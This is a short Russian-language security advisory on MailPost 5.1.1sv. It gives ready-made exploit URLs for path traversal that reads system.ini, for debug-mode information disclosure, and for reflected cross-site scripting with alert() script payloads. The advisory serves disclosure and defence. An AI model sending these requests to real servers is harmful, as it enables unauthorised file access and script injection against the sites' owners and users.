Программа: MailPost 5.1.1sv 

Удаленный атакующий может выполнить межсайтовый скриптинг и получить доступ к важной информации на системе.
Удаленный атакующий может определить наличие определенного файла на системе с помощью специально сформированного URL: 

http://[target]/scripts/mailpost.exe/TEST/..%255c..%255c..%255 cwinnt/system.ini?*nosend*=&email=
test@procheckup.com

Если приложение запущена в режиме отладки, удаленный атакующий с помощью специального URL может получить информацию об установочной директории приложения на сервере, а также версию продукта:

http://[target]/scripts/mailpost.exe?*debug*=''

Удаленный атакующий может выполнить межсайтовый скриптинг, если приложение запущено в режиме отладки. Уязвимость существует из-за некорректной обработки переменой
'append':

http://[target]/scripts/mailpost.exe?*debug*=''&append= <script>alert('Can%20Cross%20Site%20Script')</script>

Подобная уязвимость существует при добавлении слеша к имени файла:

http://[target]/scripts/mailpost.exe/<script> alert('hi')</script>/mail.txt

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии